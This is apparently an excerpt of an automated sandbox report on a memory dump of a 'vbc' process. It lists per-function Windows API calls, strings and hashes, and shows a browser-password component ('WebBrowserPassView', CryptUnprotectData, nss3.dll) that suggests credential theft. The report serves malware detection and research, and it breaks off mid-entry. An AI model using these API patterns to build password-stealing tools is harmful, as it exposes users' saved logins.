• Instruction Fuzzy Hash: A6412D7590021DAFDB20DF64CC80FDAB3FCBB09344F0485AAB559D2141DA34AB448F64
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32 ref: 00404F51
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00404F6A
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00404F77
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00404F83
• memset.MSVCRT ref: 00404FE7
• SendMessageW.USER32(?,0000105F,?,?), ref: 0040501C
• SetFocus.USER32(?), ref: 004050A2
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
                                                                                                                                                                        • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4281309102-0
                                                                                                                                                                        • Opcode ID: cabf6ed893144343294746ff1285555b4b015a401c90904a970732f73e5fe41f
                                                                                                                                                                        • Instruction ID: 4a7769bfe8dd657eebcefc70b29ecb6e887c437cb47c08b61b0609965a717ddb
                                                                                                                                                                        • Opcode Fuzzy Hash: cabf6ed893144343294746ff1285555b4b015a401c90904a970732f73e5fe41f
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B415975900219BBDB20DF95CC89EAFBFB9EF04754F1040AAF508A6291D3749A90CFA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snwprintfwcscat
                                                                                                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                        • API String ID: 384018552-4153097237
                                                                                                                                                                        • Opcode ID: f46ff3c48073cbe96136da65081651e95d718f608025dc9e628f6efcf1769426
                                                                                                                                                                        • Instruction ID: 8f1261d6e50b9fc48a8d4c2a01cb2efc3c1dd918db621c17a7092c97f5fd87e6
                                                                                                                                                                        • Opcode Fuzzy Hash: f46ff3c48073cbe96136da65081651e95d718f608025dc9e628f6efcf1769426
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E318D31900209EFDF04EF54CC86AAE7F75FF44320F1001AAE905AB2E2C738AA55DB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                        • String ID: 0$6
                                                                                                                                                                        • API String ID: 2029023288-3849865405
                                                                                                                                                                        • Opcode ID: 00042f4cecb0564cffffbf5123c116da2299592ae5eb2f27c9d7456f419c59bb
                                                                                                                                                                        • Instruction ID: 3c4375d2aaca836e1f5ba8730f1b4cbf28b1f601c5efe325adce4426e162c3cb
                                                                                                                                                                        • Opcode Fuzzy Hash: 00042f4cecb0564cffffbf5123c116da2299592ae5eb2f27c9d7456f419c59bb
                                                                                                                                                                        • Instruction Fuzzy Hash: 6A218B72605340ABD710DF55D845A9BB7E8FB89B54F00063FF644A2291E77ADA00CBDE
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408716
                                                                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 00408742
                                                                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 00408757
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00408767
                                                                                                                                                                        • wcscat.MSVCRT ref: 00408774
                                                                                                                                                                        • wcscat.MSVCRT ref: 00408783
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00408795
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1331804452-0
                                                                                                                                                                        • Opcode ID: faaca5197708b47c47af442705d4c9df3f3a62e632b81e41ea1eb2464032714f
                                                                                                                                                                        • Instruction ID: e89223cf66055297cb9dadcb336121efaa359588445afa49c1b13fad1ad85cab
                                                                                                                                                                        • Opcode Fuzzy Hash: faaca5197708b47c47af442705d4c9df3f3a62e632b81e41ea1eb2464032714f
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D1160B280011CBBEF11AF94DD45EEB7BBCEB41744F10407BBA04A6091D6389E448B79
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • <%s>, xrefs: 0040D8E2
                                                                                                                                                                        • <?xml version="1.0" ?>, xrefs: 0040D8B8
                                                                                                                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040D8BF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$_snwprintf
                                                                                                                                                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                        • API String ID: 3473751417-2880344631
                                                                                                                                                                        • Opcode ID: 6c1110d14c1add4ef8e68146380b3aae4225835160ec4e19b547157684646b60
                                                                                                                                                                        • Instruction ID: 334aba75e86a29cb8f13e765f22732fbee0fc66aecb0188c901082e5a368eb6e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6c1110d14c1add4ef8e68146380b3aae4225835160ec4e19b547157684646b60
                                                                                                                                                                        • Instruction Fuzzy Hash: 6C01DFB2A402197BE710A759CC41FAA776DEF44744F1440B7B60CF3141D7389E458799
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                        • String ID: %2.2X
                                                                                                                                                                        • API String ID: 2521778956-791839006
                                                                                                                                                                        • Opcode ID: 5a064a07adf84ed7b2831601ac1f3950ee49257a2339621e3ef87230185a7937
                                                                                                                                                                        • Instruction ID: 7e3155c1ee39ddc5e1c88fc61abef366a99ea1f709d40badb718d03975286e65
                                                                                                                                                                        • Opcode Fuzzy Hash: 5a064a07adf84ed7b2831601ac1f3950ee49257a2339621e3ef87230185a7937
                                                                                                                                                                        • Instruction Fuzzy Hash: 8F012873D4031866F734E7519C46BBA33A8AB81B18F11403FFC54B51C2EA7CDA4446D8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00443CA6
                                                                                                                                                                        • wcscat.MSVCRT ref: 00443CB5
                                                                                                                                                                        • wcscat.MSVCRT ref: 00443CC6
                                                                                                                                                                        • wcscat.MSVCRT ref: 00443CD5
                                                                                                                                                                        • VerQueryValueW.VERSION(?,?,00000000,?), ref: 00443CEF
                                                                                                                                                                          • Part of subcall function 0040807E: wcslen.MSVCRT ref: 00408085
                                                                                                                                                                          • Part of subcall function 0040807E: memcpy.MSVCRT ref: 0040809B
                                                                                                                                                                          • Part of subcall function 00408148: lstrcpyW.KERNEL32(?,?), ref: 0040815D
                                                                                                                                                                          • Part of subcall function 00408148: lstrlenW.KERNEL32(?), ref: 00408164
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                        • String ID: \StringFileInfo\
                                                                                                                                                                        • API String ID: 393120378-2245444037
                                                                                                                                                                        • Opcode ID: 9500244735cad2a77f643a6d996c161e8bec2251a1074d797bccc37d017a6394
                                                                                                                                                                        • Instruction ID: 4bcd922806ee50f9cb47b7d9b2cc513868d30f54de93413914084f8cb2eb3ca3
                                                                                                                                                                        • Opcode Fuzzy Hash: 9500244735cad2a77f643a6d996c161e8bec2251a1074d797bccc37d017a6394
                                                                                                                                                                        • Instruction Fuzzy Hash: B801847290020DA6EF11EAA1CC45EDF777CAB44308F1005B7B654F2052EA3CDB869B58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _snwprintfwcscpy
• String ID: dialog_%d$general$menu_%d$strings
• API String ID: 999028693-502967061
• Opcode ID: 167585e561b408c48eaedfed01294a32f4914c684c08b453e3d5971788cf8a7a
• Instruction ID: fa5e8ebf88800a0e12fd117f624f479e56397311d80730f797776366f89ad5f2
• Opcode Fuzzy Hash: 167585e561b408c48eaedfed01294a32f4914c684c08b453e3d5971788cf8a7a
• Instruction Fuzzy Hash: 9FE086717C830031FE1115511E83F162150C6E5F95FB1046BF505B16D2DB7D8864668F
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset
• String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-1606337402
• Opcode ID: 8c8ae128e2328f7302dbfa3f65ab71e8e651d3896b870492eb27771cacaf7654
• Instruction ID: c7fea52ce07df1abaedfaf21b9d509cbcb108d5d19e9a81960d934b60e9c5d67
• Opcode Fuzzy Hash: 8c8ae128e2328f7302dbfa3f65ab71e8e651d3896b870492eb27771cacaf7654
• Instruction Fuzzy Hash: 6A818D70A083219FDB10DF15E48161BB7E0AF94324F59885FEC859B252D378EC95CB9B
Uniqueness
Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004115CD,00000000,00000000), ref: 00413152
• memset.MSVCRT ref: 004131B4
• memset.MSVCRT ref: 004131C4
  • Part of subcall function 00413031: wcscpy.MSVCRT ref: 0041305A
• memset.MSVCRT ref: 004132AF
• wcscpy.MSVCRT ref: 004132D0
• CloseHandle.KERNEL32(?,004115CD,?,?,?,004115CD,00000000,00000000), ref: 00413326
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$wcscpy$CloseHandleOpenProcess
• String ID:
• API String ID: 3300951397-0
• Opcode ID: f89de95a6920a90433c065a9965a4fcf749ac6404f68e573733b6ce647e0e13f
• Instruction ID: cefdbdf849389f09311ea621c5a87f262da3bfb792e558c61850347b92c9bf04
• Opcode Fuzzy Hash: f89de95a6920a90433c065a9965a4fcf749ac6404f68e573733b6ce647e0e13f
• Instruction Fuzzy Hash: 0D514971108344AFD720DF65CC88A9BB7E8FB84306F404A2EF99982251DB74DA44CB6A
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00417F17
• GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00417F25
• free.MSVCRT(00000000), ref: 00417F6B
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AttributesFilefreememset
• String ID:
• API String ID: 2507021081-0
• Opcode ID: 589a6b9333c77986f3b6355c6ce351534fc2f1959dd785c0c1c88223f13a717d
• Instruction ID: b8dc40b53dc963fdbe0ae3b1e60dcad109612476599bdcfb1117a2ceff08efc0
• Opcode Fuzzy Hash: 589a6b9333c77986f3b6355c6ce351534fc2f1959dd785c0c1c88223f13a717d
• Instruction Fuzzy Hash: 0811B73690C1159B9B109F649CC15EF7278DB49354B21013BF912A2281D63C9D82D2AD
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040EF4D
  • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
  • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
  • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
  • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
  • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
  • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
  • Part of subcall function 00408AE8: memset.MSVCRT ref: 00408B09
  • Part of subcall function 00408AE8: _snwprintf.MSVCRT ref: 00408B3C
  • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B48
  • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B60
  • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B6E
  • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B81
  • Part of subcall function 00408907: GetSaveFileNameW.COMDLG32(?), ref: 00408956
  • Part of subcall function 00408907: wcscpy.MSVCRT ref: 0040896D
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 1392923015-3614832568
• Opcode ID: e098a2b6de55531eea522cb88dcf061458ab68b85293c38f111b81194adb8019
• Instruction ID: 893d8713e26b77edc4206c052df4fc7d3163be0104e9675467069f1f0f0c5c5e
• Opcode Fuzzy Hash: e098a2b6de55531eea522cb88dcf061458ab68b85293c38f111b81194adb8019
• Instruction Fuzzy Hash: 963150B1D006199FDB10EF96D8856DD7BB4FF04318F20417BF908B7281EB786A458B98
Uniqueness
Uniqueness Score: -1.00%

APIs
• AreFileApisANSI.KERNEL32 ref: 00416E17
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00416E35
• malloc.MSVCRT ref: 00416E3F
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00416E56
• free.MSVCRT(?), ref: 00416E5F
• free.MSVCRT(?,?), ref: 00416E7D
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWidefree$ApisFilemalloc
• String ID:
• API String ID: 4131324427-0
• Opcode ID: ef1d8c4a491119e611ed89199fe48a787826ffdbe5a65be19b588c9cf178c72a
• Instruction ID: 8f18c9831eb1c79f14fd8e789aed1b74bdecd3d50ffb4352c5f07f5f59d31971
• Opcode Fuzzy Hash: ef1d8c4a491119e611ed89199fe48a787826ffdbe5a65be19b588c9cf178c72a
• Instruction Fuzzy Hash: 4901FC7A504221BBAB215B75EC01EEF36DCDF457B07220326FC14E7290DA28DD4145EC
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy
• String ID: NA$LMA$MMA$MMA
• API String ID: 3510742995-965156261
• Opcode ID: 55ac8c502bd4826d858cd5ef6fc5d691ccd3d3d57d4c1cb0b8c1e43a78ebe62b
• Instruction ID: 8582fd1753a63c193c8d59700b7b4d4e45a0e47666d49b47a36a18adf3e061cc
• Opcode Fuzzy Hash: 55ac8c502bd4826d858cd5ef6fc5d691ccd3d3d57d4c1cb0b8c1e43a78ebe62b
• Instruction Fuzzy Hash: DBE09A30940350DAE360A744DC82F823294A742B26F11843BE508229E3C3FC98C88BAD
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTempPathW.KERNEL32(000000E6,?,?,0041767E), ref: 00417AF6
• GetTempPathA.KERNEL32(000000E6,?,?,0041767E), ref: 00417B1E
• free.MSVCRT(00000000,0044C838,00000000), ref: 00417B46
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: PathTemp$free
• String ID: %s\etilqs_$etilqs_
• API String ID: 924794160-1420421710
• Opcode ID: ef23db0a414d9dcf011a3825053a170985a18b01ba0b77813df6364c9434a8ca
• Instruction ID: 98cb418060ea171a52ad1c8f6cb6bf58db0dc7ae7347cd78cc57f1029aea62d9
• Opcode Fuzzy Hash: ef23db0a414d9dcf011a3825053a170985a18b01ba0b77813df6364c9434a8ca
• Instruction Fuzzy Hash: F8314B3160C2595AE730A7659C41BFB73AD9F6434CF2404AFE481C2182EF6CEEC58A5D
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040D611
  • Part of subcall function 004147A8: memcpy.MSVCRT ref: 00414825
  • Part of subcall function 0040CDFA: wcscpy.MSVCRT ref: 0040CDFF
  • Part of subcall function 0040CDFA: _wcslwr.MSVCRT ref: 0040CE3A
• _snwprintf.MSVCRT ref: 0040D65B
Similarity
• API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 1775345501-2769808009
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040F329
  • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
• wcsrchr.MSVCRT ref: 0040F343
• wcscat.MSVCRT ref: 0040F35F
Similarity
• API ID: FileModuleNamememsetwcscatwcsrchr
• String ID: .cfg$General
• API String ID: 776488737-1188829934
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 0040FBF3
• RegisterClassW.USER32 ref: 0040FC18
• GetModuleHandleW.KERNEL32(00000000), ref: 0040FC1F
• CreateWindowExW.USER32 ref: 0040FC3E
Similarity
• API ID: HandleModule$ClassCreateRegisterWindow
• String ID: WebBrowserPassView
• API String ID: 2678498856-2171583229
Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
• GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
• FreeLibrary.KERNEL32(00000000), ref: 00403BFD
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: CryptUnprotectData$crypt32.dll
• API String ID: 145871493-1827663648
Uniqueness Score: -1.00%

APIs
• wcscpy.MSVCRT ref: 004140A9
• wcscpy.MSVCRT ref: 004140C4
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000,0040F398,00000000,?,0040F398,?,General,?), ref: 004140EB
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 004140F2
Similarity
• API ID: wcscpy$CloseCreateFileHandle
• String ID: General
• API String ID: 999786162-26480598
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,?,0040DEA5,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 00407E08
• _snwprintf.MSVCRT ref: 00407E35
• MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00407E4E
Similarity
• API ID: ErrorLastMessage_snwprintf
• String ID: Error$Error %d: %s
• API String ID: 313946961-1552265934
Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(shlwapi.dll,745D48C0,?,00404C4C,00000000), ref: 00414746
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00414754
• FreeLibrary.KERNEL32(00000000,?,00404C4C,00000000), ref: 0041476C
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 145871493-1506664499
Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                        • API String ID: 0-1953309616
                                                                                                                                                                        • Opcode ID: e023502b744750f4b23ffe04e2ae5b216edfebde367b4abfa2077d4614065f4c
                                                                                                                                                                        • Instruction ID: aa3871157cb2c29edb2d7db9a5a62b5d9e1ddd85e1ada7e098d24c65e5f6a169
                                                                                                                                                                        • Opcode Fuzzy Hash: e023502b744750f4b23ffe04e2ae5b216edfebde367b4abfa2077d4614065f4c
                                                                                                                                                                        • Instruction Fuzzy Hash: 60E1BF71E00209EFDB14DFA5D981AAEBBB5FF48304F10806AE805AB341DB78AD51CB95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • unknown column "%s" in foreign key definition, xrefs: 004310A5
                                                                                                                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 00430F1A
                                                                                                                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430F42
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                        • API String ID: 3510742995-272990098
                                                                                                                                                                        • Opcode ID: a27afdf262ea2b2f13aa3d7c6496d52117a55a242e1c635bc0b46c3f4d569d41
                                                                                                                                                                        • Instruction ID: b4e089481029338f932d4991b26cccaedb5970869045d73953a00dcfe725fe6b
                                                                                                                                                                        • Opcode Fuzzy Hash: a27afdf262ea2b2f13aa3d7c6496d52117a55a242e1c635bc0b46c3f4d569d41
                                                                                                                                                                        • Instruction Fuzzy Hash: 10914B75A00209DFCB24DF59C480A9EBBF1FF48304F15819AE809AB312D739E942CF99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetwcslen$wcscatwcscpy
                                                                                                                                                                        • String ID: nss3.dll
                                                                                                                                                                        • API String ID: 1250441359-2492180550
                                                                                                                                                                        • Opcode ID: 09e33b56ee97e3876529d6a1dbd088a7e67531a27dd58c4da1fdcc6a23c597f8
                                                                                                                                                                        • Instruction ID: 1e34d79d1f5922d0320f8d763ab64a9784b47cc615ba08cf08abcfcfe76fb249
                                                                                                                                                                        • Opcode Fuzzy Hash: 09e33b56ee97e3876529d6a1dbd088a7e67531a27dd58c4da1fdcc6a23c597f8
                                                                                                                                                                        • Instruction Fuzzy Hash: D511ECF290121D96EB10EB60DD49BC673BC9B15314F1004BBE60DF21C1FB79DA548A5D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C127
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C135
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C146
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C15D
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C166
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040C19C
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040C1AF
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040C1C2
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040C1D5
                                                                                                                                                                        • free.MSVCRT(00000000), ref: 0040C20E
                                                                                                                                                                          • Part of subcall function 00408F1E: free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??3@$free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2241099983-0
                                                                                                                                                                        • Opcode ID: b651c62b607cea7bb0db53ebb6174c0f1cadef425dc2d358b3fe847b53385816
                                                                                                                                                                        • Instruction ID: 1b724bf31a54a7cffb96c88967fdb5b0379f9a1dee2f65518d31c165403446cb
                                                                                                                                                                        • Opcode Fuzzy Hash: b651c62b607cea7bb0db53ebb6174c0f1cadef425dc2d358b3fe847b53385816
                                                                                                                                                                        • Instruction Fuzzy Hash: 6E01E532905A31D7D6257B7AA68151FB396BEC2710316026FF845BB2C38F3C6C414ADD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • AreFileApisANSI.KERNEL32 ref: 00416DB2
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00416DD2
                                                                                                                                                                        • malloc.MSVCRT ref: 00416DD8
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00416DF6
                                                                                                                                                                        • free.MSVCRT(?), ref: 00416DFF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
